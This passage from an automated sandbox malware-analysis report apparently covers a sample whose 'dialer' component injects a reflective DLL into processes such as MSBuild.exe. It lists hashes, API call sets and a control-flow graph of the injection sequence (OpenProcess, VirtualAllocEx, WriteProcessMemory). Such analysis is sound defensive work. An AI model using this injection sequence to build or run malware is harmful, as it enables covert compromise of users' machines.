                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID: e+000$gfff
                                                                                                                                          • API String ID: 3215553584-3030954782
                                                                                                                                          • Opcode ID: 4c9e796696dd45bbd56c716731e9bf31e04af504279088f1e88f70b5134b5212
                                                                                                                                          • Instruction ID: c3449c63ffb1b13f42e522822b158c43401eddf6e0e74d52762e56846d6e21f4
                                                                                                                                          • Opcode Fuzzy Hash: 4c9e796696dd45bbd56c716731e9bf31e04af504279088f1e88f70b5134b5212
                                                                                                                                          • Instruction Fuzzy Hash: 9E514B66B187C146E7248F3999617ED6B91E741B90F488231D7AC4BBDECF2CE494C701
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileHandleType
                                                                                                                                          • String ID: @
                                                                                                                                          • API String ID: 3000768030-2766056989
                                                                                                                                          • Opcode ID: 6a82a2755471bbe3140ec34f2b46b4a4d36938cf7a414f9e3e7c0b309ff8612f
                                                                                                                                          • Instruction ID: eac6e6f5afa7d47b5e3fe7909507e2b8a998bcb1fe9230dd65ad9e69facf0cad
                                                                                                                                          • Opcode Fuzzy Hash: 6a82a2755471bbe3140ec34f2b46b4a4d36938cf7a414f9e3e7c0b309ff8612f
                                                                                                                                          • Instruction Fuzzy Hash: 04219A29B0868242EB644B29A4A05BD2651EB45F78F281335E67F177DCCF3CDD91D340
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _handle_error
                                                                                                                                          • String ID: "$pow
                                                                                                                                          • API String ID: 1757819995-713443511
                                                                                                                                          • Opcode ID: a2286bed898c3a1dc120edbe39e3dc83cc2fb9b1afc78ecec7540b835b5520b7
                                                                                                                                          • Instruction ID: 7ec13a44840a3f89be80d858979292be71207145b205c7805ce83ac274a45a94
                                                                                                                                          • Opcode Fuzzy Hash: a2286bed898c3a1dc120edbe39e3dc83cc2fb9b1afc78ecec7540b835b5520b7
                                                                                                                                          • Instruction Fuzzy Hash: EF215276E1CAC587D770CF14F041AAEBAB1FBDA748F101326F69906998CBBDD0959B00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _handle_error
                                                                                                                                          • String ID: !$sqrt
                                                                                                                                          • API String ID: 1757819995-799759792
                                                                                                                                          • Opcode ID: 9cdd7abfc7ec2821ff9fb9a8809c2d28657f168e2a9a912b69486da624d67edc
                                                                                                                                          • Instruction ID: 43d6d5d92b53c8903b6d2827fad83cc3208fb3c62f66264b121641e33e00e2d1
                                                                                                                                          • Opcode Fuzzy Hash: 9cdd7abfc7ec2821ff9fb9a8809c2d28657f168e2a9a912b69486da624d67edc
                                                                                                                                          • Instruction Fuzzy Hash: AC11827AE18B8582EF51CF11A42076E6661BF967E4F104331EA7D0ABD8DB2DE0859B00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _handle_error
                                                                                                                                          • String ID: !$cos
                                                                                                                                          • API String ID: 1757819995-1949035351
                                                                                                                                          • Opcode ID: f47f7497202482cb2f08d584c0fa264cf8c0e926f5667d361038845dcde98604
                                                                                                                                          • Instruction ID: e114cc4321c7ca107f2ae2cf559db4c130d5266599e812a01f8b214ade8a98eb
                                                                                                                                          • Opcode Fuzzy Hash: f47f7497202482cb2f08d584c0fa264cf8c0e926f5667d361038845dcde98604
                                                                                                                                          • Instruction Fuzzy Hash: 47010876F19B8542E714CF22942076A6261FB95794F508335EA6D0BBCCDF6CE0404700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                          • String ID: !$sin
                                                                                                                                          • API String ID: 3384550415-1565623160
                                                                                                                                          • Opcode ID: df28e9a67e61d528742b7ef0ded55c29f0354dc44f80b572b08f747d16e1a453
                                                                                                                                          • Instruction ID: d7717c854d4f4d8be3bbccf3d807356398b46cc2f7b5d780489fbfc029931ddd
                                                                                                                                          • Opcode Fuzzy Hash: df28e9a67e61d528742b7ef0ded55c29f0354dc44f80b572b08f747d16e1a453
                                                                                                                                          • Instruction Fuzzy Hash: 04018475F18B8941DB14CF12A42076A6662FB9A7D4F104335EA5D1ABDCEF7CE1508B00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                          • String ID: !$tan
                                                                                                                                          • API String ID: 3384550415-2428968949
                                                                                                                                          • Opcode ID: 3e6c1757c7b457beae6c6f04f07cf88cb9c67e06ee7f833b012c64832aee675f
                                                                                                                                          • Instruction ID: 0d7aaea710b1c3cd80566400f702eabca139da78507eeb311f8ecc21a1d2e610
                                                                                                                                          • Opcode Fuzzy Hash: 3e6c1757c7b457beae6c6f04f07cf88cb9c67e06ee7f833b012c64832aee675f
                                                                                                                                          • Instruction Fuzzy Hash: 0F017575F28B8541E714CF12946076A6662FF9A7D4F104335E96D1ABDCEF7CE1405700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                                                          • String ID: !$cos
                                                                                                                                          • API String ID: 3384550415-1949035351
                                                                                                                                          • Opcode ID: 67dbfd4f201f226b19c21def6f8ef23c5db519089eb0727a8a8b4c6509d4d56b
                                                                                                                                          • Instruction ID: f1a046c23d4ef31acf33583f3598f918dc885eef26355df30cc5c6fe5e6c4fed
                                                                                                                                          • Opcode Fuzzy Hash: 67dbfd4f201f226b19c21def6f8ef23c5db519089eb0727a8a8b4c6509d4d56b
                                                                                                                                          • Instruction Fuzzy Hash: 0901B576F18B8941E714CF12942076A6262FF9A7D4F104335E9691ABDCEF6CE0405700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true
                                                                                                                                          • Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          • Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _handle_error
                                                                                                                                          • String ID: "$exp
                                                                                                                                          • API String ID: 1757819995-2878093337
                                                                                                                                          • Opcode ID: dc88cf671f0a416903fab45837691bc0dfd090079675b840c4007397e590dbc5
                                                                                                                                          • Instruction ID: a994c1fbf813cc04daa053d5b0df52b5d0d3966c81783965a0a77bc3aef8a923
                                                                                                                                          • Opcode Fuzzy Hash: dc88cf671f0a416903fab45837691bc0dfd090079675b840c4007397e590dbc5
                                                                                                                                          • Instruction Fuzzy Hash: 5C01653AE28A8887E320CF2494456AA7A61FFEA744F205315E7441A6A4DB7ED4919B00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000006.00000002.1730605056.00007FF617A61000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF617A60000, based on PE: true
                                                                                                                                          • Associated: 00000006.00000002.1730572926.00007FF617A60000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                          • Associated: 00000006.00000002.1730634799.00007FF617A69000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                          • Associated: 00000006.00000002.1730692558.00007FF617A91000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                          • Associated: 00000006.00000002.1731262444.00007FF617FB7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                          • Associated: 00000006.00000002.1731313526.00007FF617FBA000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                          • Associated: 00000006.00000002.1731343807.00007FF617FBE000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                          • Associated: 00000006.00000002.1731368401.00007FF617FC3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                          • Associated: 00000006.00000002.1731398664.00007FF617FC4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff617a60000_setup.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8e2382d73125df78936d26452b80bcba07539e5c8c97af36270da171beb56e3f
                                                                                                                                          • Instruction ID: dea44c386d5e6470529d1a6fa1cd7d1cabfbec2a76929e0c0bddf3755a423599
                                                                                                                                          • Opcode Fuzzy Hash: 8e2382d73125df78936d26452b80bcba07539e5c8c97af36270da171beb56e3f
                                                                                                                                          • Instruction Fuzzy Hash: CCB01270E08A4DCCE3002F05D84125C37306B08F10F404430D40C43353CE7CB4508710
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Callgraph

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateProcess$Close$CurrentResource$FileFindSecurityThread$ChangeDescriptorFreeHandleHeapModuleNotificationOpenProtectTokenValueVirtual$AdjustAllocConvertErrorInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                                                                                          • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                                                                                          • API String ID: 1970497257-1130149537
                                                                                                                                          • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                                                                          • Instruction ID: 04699a5d65f21b7bb95f8c1e480dee23d0a80a214912cc637b651e7e6d772535
                                                                                                                                          • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                                                                                          • Instruction Fuzzy Hash: 00815F36A08B4296EF309F25E8441A977A0FF88759B484177DA8EE7B64DF3CE148C744
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 24 7ff65a1310c0-7ff65a131110 call 7ff65a1318ac 27 7ff65a131116-7ff65a13111c 24->27 28 7ff65a1314ba-7ff65a1314d6 24->28 27->28 29 7ff65a131122-7ff65a131138 OpenProcess 27->29 29->28 30 7ff65a13113e-7ff65a13115b OpenProcess 29->30 31 7ff65a1311fd-7ff65a13121e NtQueryInformationProcess 30->31 32 7ff65a131161-7ff65a131178 K32GetModuleFileNameExW 30->32 35 7ff65a1314b1-7ff65a1314b4 CloseHandle 31->35 36 7ff65a131224-7ff65a13122a 31->36 33 7ff65a1311aa-7ff65a1311b6 CloseHandle 32->33 34 7ff65a13117a-7ff65a131195 PathFindFileNameW lstrlenW 32->34 33->31 39 7ff65a1311b8-7ff65a1311d3 33->39 34->33 38 7ff65a131197-7ff65a1311a7 StrCpyW 34->38 35->28 36->35 37 7ff65a131230-7ff65a131248 OpenProcessToken 36->37 37->35 40 7ff65a13124e-7ff65a131274 GetTokenInformation 37->40 38->33 41 7ff65a1311d8-7ff65a1311ea StrCmpIW 39->41 42 7ff65a131276-7ff65a13127f GetLastError 40->42 43 7ff65a1312f1 40->43 41->35 44 7ff65a1311f0-7ff65a1311fb 41->44 42->43 45 7ff65a131281-7ff65a131295 LocalAlloc 42->45 46 7ff65a1312f8-7ff65a131306 CloseHandle 43->46 44->31 44->41 45->43 47 7ff65a131297-7ff65a1312bd GetTokenInformation 45->47 46->35 48 7ff65a13130c-7ff65a131313 46->48 49 7ff65a1312df 47->49 50 7ff65a1312bf-7ff65a1312dd GetSidSubAuthorityCount GetSidSubAuthority 47->50 48->35 51 7ff65a131319-7ff65a131324 48->51 52 7ff65a1312e6-7ff65a1312ef LocalFree 49->52 50->52 51->35 53 7ff65a13132a-7ff65a131334 51->53 52->46 53->35 54 7ff65a13133a-7ff65a131344 53->54 54->35 55 7ff65a13134a-7ff65a13138a call 7ff65a131ec4 * 3 54->55 55->35 62 7ff65a131390-7ff65a1313b0 call 7ff65a131ec4 StrStrA 55->62 65 7ff65a1313c8-7ff65a1313ed call 7ff65a131ec4 * 2 62->65 66 7ff65a1313b2-7ff65a1313c1 62->66 65->35 72 7ff65a1313f3-7ff65a13141a VirtualAllocEx 65->72 66->62 67 7ff65a1313c3 66->67 67->35 72->35 73 7ff65a131420-7ff65a131439 WriteProcessMemory 72->73 73->35 74 7ff65a13143b-7ff65a13145d call 7ff65a13211c 73->74 74->35 77 7ff65a13145f-7ff65a131467 74->77 77->35 78 7ff65a131469-7ff65a13146f 77->78 79 7ff65a131478-7ff65a131485 WaitForSingleObject 78->79 80 7ff65a131471-7ff65a131476 78->80 82 7ff65a1314a6 79->82 83 7ff65a131487-7ff65a13149b GetExitCodeThread 79->83 81 7ff65a1314ab FindCloseChangeNotification 80->81 81->35 82->81 83->82 84 7ff65a13149d-7ff65a1314a3 83->84 84->82
                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process$Close$Open$FindHandleInformationToken$AllocAuthorityChangeFileLocalNameNotification$CodeCountErrorExitFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                                                                                          • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                                                                                          • API String ID: 2998269048-3753927220
                                                                                                                                          • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                                                                          • Instruction ID: dd7df13c16794430a1aec4a0f28db0026885bceef8b7f8f801d0f6351a9217ca
                                                                                                                                          • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                                                                                          • Instruction Fuzzy Hash: DFB18031A0868296EF34CF16E8442B927E5FF84B84F088176CA8EA7794DF3CE545C744
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Heap$Process$AllocEnumFree$ChangeCloseFindMemoryModulesNotificationOpenProcessesRead
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2178662837-0
                                                                                                                                          • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                                                                          • Instruction ID: 08d6603cf205052dc1854035e52b3dd3b3937f717723958e479da44f8965ed33
                                                                                                                                          • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                                                                                          • Instruction Fuzzy Hash: 9D51CE72B196828AEF60CF66E8546A922A1FF49B84F484076DE8DA7754DF3CD046C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3197395349-0
                                                                                                                                          • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                                                                          • Instruction ID: bb48154b40bdbe8833062395d6a6230a7eaa38ea53faf43ef641ebfdc5356556
                                                                                                                                          • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                                                                                          • Instruction Fuzzy Hash: 8D3171326146518ADB20CF24E48079E77A5FB48798F44422AEB8D97E98DF3CE148CB44
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000011.00000002.1796684320.00007FF65A131000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF65A130000, based on PE: true
                                                                                                                                          • Associated: 00000011.00000002.1796649714.00007FF65A130000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796749741.00007FF65A133000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          • Associated: 00000011.00000002.1796796645.00007FF65A136000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_17_2_7ff65a130000_dialer.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$CloseCreateHandleModuleProtectVirtual$ChangeCurrentFindFreeInformationLibraryMappingNotificationProcessViewlstrcmpi
                                                                                                                                          • String ID: .text$C:\Windows\System32\
                                                                                                                                          • API String ID: 1125510917-832442975
                                                                                                                                          • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
